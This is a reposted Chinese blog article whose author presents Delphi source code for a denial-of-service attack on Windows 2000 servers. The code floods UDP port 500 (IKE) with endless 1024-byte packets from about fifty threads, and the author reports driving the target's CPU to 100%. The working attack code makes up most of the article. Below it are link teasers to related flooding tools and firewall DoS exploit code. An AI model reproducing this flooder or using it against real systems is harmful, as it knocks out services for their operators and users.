udp 500 D.O.S攻击 (转)

最新推荐文章于 2025-09-29 13:56:47 发布
转载 最新推荐文章于 2025-09-29 13:56:47 发布 · 124 阅读 · 0
文章标签:

#网络 #操作系统

本文介绍了一种针对Windows 2000服务器的UDP500端口DDoS攻击方法,通过发送大量UDP数据包使服务器CPU占用率达到100%,导致服务器响应缓慢。文章提供了实现该攻击的线程程序示例。
udp 500 D.O.S攻击 (转)[@more@]

  前些日子,看见有文章说win2000服务器的500端口对flood攻击防御不是很好,我测试了一下,发现很有效果,对win2000服务器的udp500发送大量包的时候,win2000服务器的cpu率一下子达到了100%,而且反应立刻迟钝下来.

程序如下:

线程程序://线程的执行代码,创建线程请用菜单new一个Theadobject

uses winsock;

procedure udpdos.Execute;
var
wsa:TWSAData;
s: TSocket;
sockin: TSockAddrIn;
buf:array[0..1023] of byte;
i: integer;
DIP:string;
begin
  { Place thread code here }
//win2000下利用ike(udp 500)的DOS攻击
//by 杨顺
  FreeOnTeRminate := true;

//destIP是主Form里面上,就是要攻击的对象,在主Form里面申明一个这样的变量就可以了
  Dip := DestIP;

//填充buf
  for i := 0 to 1023 do
  buf[i] := 97;

//初始化socket2
  WSAStartup($101,wsa);

//创建udp socket
  s := socket(AF_.NET,SOCK_DGRAM,IPPROTO_UDP);
  sockin.sin_family := AF_INET;
  sockin.sin_port := htons(IKE);
  sockin.sin_addr.S_addr := .net_addr(pchar(DIP));
  while true do
  begin
  if self.Terminated then
  break;

  //发送数据报
  sendto(s,buf,1024,0,sockin,sizeof(sockin));
  end;
  closesocket(s);
  WSACleanup;

 end;

主form里面,调用

  for i := 0 to 50 do
  begin
  udpdos.Create(false); //创建50多个线程,进行攻击
  end;

顺便提一下,坚持用户输入的ip是否合法,一句话就可以了

uses winsock

  if inet_addr(pchar(DestIP)) =  inaddr_none  then
  begin
  showmessage('输入的IP地址错误');
  exit;
  end;


来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/10752043/viewspace-993778/,如需转载,请注明出处,否则将追究法律责任。

转载于:http://blog.itpub.net/10752043/viewspace-993778/

csd3176
关注
inviteflood:基于 UDP 的 SIP/SDP 洪水攻击工具!全参数详细教程!Kali Linux教程!
qq_24305079的博客
05-27 1048
inviteflood是一款基于UDP/IP的SIP攻击工具,专门通过发送大量INVITE请求对目标SIP服务实施洪水攻击。该工具可在Linux系统(如RedHat Fedora Core 4)上运行,通过模拟恶意VoIP终端建立通话请求,导致目标系统服务拒绝、通话中断和资源耗尽。作为轻量级攻击工具,它主要针对SIP协议的脆弱性进行测试和验证。
赛门铁客防火墙D.o.s攻击代码
要饭's Blog
07-11 1916
       作者:houseofdabus 名称:HOD-symantec-firewall-DoS-expl.c: 版本:Version 0.1 coded by houseofdabus 翻译:luoluo 漏洞发现:www.eEye.com 漏洞描述:http://www.eeye.com/html/Research/Advisories/AD20040512B.html * ------
udp 500 D.O.S攻击
java专栏
05-20 1090
前些日子,看见有文章说win2000服务器的500端口对flood攻击防御不是很好,我测试了一下,发现很有效果,对win2000服务器的udp500发送大量包的时候,win2000服务器的cpu率一下子达到了100%,而且反应立刻迟钝下来.程序如下:线程程序://线程的执行代码,创建线程请用菜单new一个TheadObjectuses winsock;procedure u
4. 根据UDP端口号抓IPsec协议默认的500/4500端口报文
热门推荐
阿群的笔记(同步备份自简书)
02-01 1万+
根据UDP端口号抓IPsec协议默认的500/4500端口报文 另外, 根据IP报头之中的1个字节协议类型字段区分UDP/TCP UDP编码0x11=17 TCP编码为0x06=6 -- 另外, 抓IPsec/strongSwan包, 需要利用IPsec ESP协议编码为0x32=50: ip.proto=0x32 这种包不是UDP协议, 而是ESP协议(...
linux封锁IP简单防御UDP攻击
09-15
### Linux使用封锁IP的方法简单防御UDP攻击 #### 知识点概述 - **UDP Flood攻击原理**:UDP Flood攻击是一种常见的分布式拒绝服务攻击(DDoS)类型,通过向目标服务器发送大量的无效UDP数据包,导致服务器资源耗尽...
36、网络攻击防护:ICMP、UDP、SYN/TCP 等洪水攻击及会话限制配置
最新发布
yolo5detector的博客
09-29 41
本文详细介绍了针对ICMP、UDP、SYN/TCP等常见洪水攻击的防护策略与配置方法,重点涵盖Juniper SRX设备上的屏幕(Screen)配置,包括各类攻击的阈值设置、会话限制、SYN饼干和SYN-ACK-ACK代理防护机制。通过实际配置示例、流程图及最佳实践,帮助网络管理员有效防御DDoS攻击,保障网络稳定与安全。
5-wireshark网络安全分析——UDP Flooding攻击
网络安全
03-17 4769
UDP Flooding攻击也是基于传输层的UDP协议来实现的,但与TCP协议不同的是,UDP协议是面向无连接的,即客户端和服务端之间直接进行通信,无需建立连接。因此恶意攻击者利用UDP协议面向无连接的特点,发送大量恶意的UDP数据包攻击目标网络带宽,造成网络拥堵,并且基于UDP协议的应用层协议的种类也非常多,对于UDP Flooding攻击的防御也相对比较困难。 本次UDP Floodi...
域名根服务器遭两次大规模攻击:每500万次
weixin_34185320的博客
08-01 417
北京时间12月11日凌晨消息,多个域名系统根服务器在上周初遭到两次攻击,每次攻击都持续了一两个小时,这些根服务器最多时每收到的查询请求高达500万次。 当用户在浏览器中输入一个域名时,根服务器是判定返还哪个IP地址的最终权威参考。 第一次攻击事件发生在11月30日,当时的攻击持续了2小时40分钟。第二次则发生在随后一天,持续时间为将近一小时。构成互联网...
防火墙基础之华为防火墙分支与分支IPSec 对接
晚风挽着浮云的博客
09-19 3900
原理概述:指采用来实现远程接入的一种VPN技术,IPSec全称为Internet Protocol Security,是由Internet Engineering Task Force (IETF) 定义的安全标准框架,在公网上为两个私有网络提供安全通信通道,通过加密通道保证连接的安全——在两个公共网关间提供私密数据封包服务IPSEC是一套比较完整成体系的VPN技术,它规定了一系列的协议标准。
Fortigate疑难杂症之 - IPSec传输大文件中断/其他异常中断
RaySun的技术Blog
08-03 2124
将IPSec两端的防火墙设备的IKE端口更改为非默认端口将IPSec两端的协商模式由主动模式改为野蛮模式。
防火墙内网VPN设备的试验
m0_71483678的博客
07-26 1293
需求:双机热备以主备模式,通过内网的VPN设备构建一条到达分公司的IPSEC VPN通道,保证办公区10.0.2.0/24网段可以访问到192.168.1.0/24网段 一、首先在FW1和FW3上做好双机热备的主备模式(FW1为主,FW3为备),如下图: 二、在FW1上配置安全策略,(1)放通隧道(放通源目udp500端口、目的UDP4500端口,放通esp协议),(2)放通VPN设备与办公区的所有流量,(3)放通从分公司网段到办公区网段的所有流量,如下: (1)放通隧道(放通源目
【隧道篇 / IPsec】(7.0) ❀ 05. 阻止IPsec安全隧道连接请求 ❀ FortiGat 防火墙
防火墙技术专栏
04-06 4086
在FortiGate设备上默认开放UDP 500端口,允许IPsec隧道连接。但是可能会导致安全漏洞和ISAKMP DOS攻击。ISAKMP DOS攻击会破坏预共享密钥(如果VPN采用激进模式配置),多个请求会导致CPU过载,最终填满所需的缓冲区空间。...
为什么通常一个UDP封包大小不能超过500个字节?
ttomqq的专栏
11-13 2277
原文标题: > RF: http://my.chinaunix.net/space-7240278-do-thread-id-5131.html MTU 1500字节: 以太网.1492字节: PPPoE.1472字节: ping1468字节: DHCP1430字节: VPN and PPTP 576字节: 拨号ISP RFC 1883: 最小576,新的可能会是1280 U
防火墙之IPSec VPN实验
晚风挽着浮云的博客
06-03 3582
指采用IPSec协议来实现远程接入的一种VPN技术,IPSec全称为Internet Protocol Security,是由Internet Engineering Task Force (IETF) 定义的安全标准框架,在公网上为两个私有网络提供安全通信通道,通过加密通道保证连接的安全——在两个公共网关间提供私密数据封包服务IPSEC是一套比较完整成体系的VPN技术,它规定了一系列的协议标准。
华为防火墙ipsec vpn nat穿越2种场景配置案例
IT技术
11-09 4759
华为防火墙ipsec vpn nat穿越2种场景配置案例
网工必知的《网络端口号大全》,看这一份足够了
09-05 5851
默认情况下,SNMP使用端口161进行管理信息的请求和接收,使用端口162接收设备发送的陷阱(trap)消息。默认情况下,RADIUS使用端口1812进行认证和授权,使用端口1813进行计费。为了确保通话的安全性,建议使用加密和认证机制,如TLS。虽然LPR协议广泛应用于许多网络打印环境,但它缺乏加密和认证机制,因此建议在安全的网络环境中使用,或结合其他安全措施。RTP协议提供了对时间同步、数据传输和带宽管理的支持,是实时音视频通信的基础协议,广泛应用于VoIP、视频会议和直播等应用场景。
怎么查看是否有以UDP协议往外发数据
02-26
好的,用户之前问过如何确定Linux服务器上是否有UDP协议发送的数据,现在他又问怎么查看是否有以UDP协议往外发数据。... - 高频外发到陌生 IP/端口、大流量 UDP 泛洪(可能为 DDoS 攻击或恶意软件)。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符  | 博主筛选后可见
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值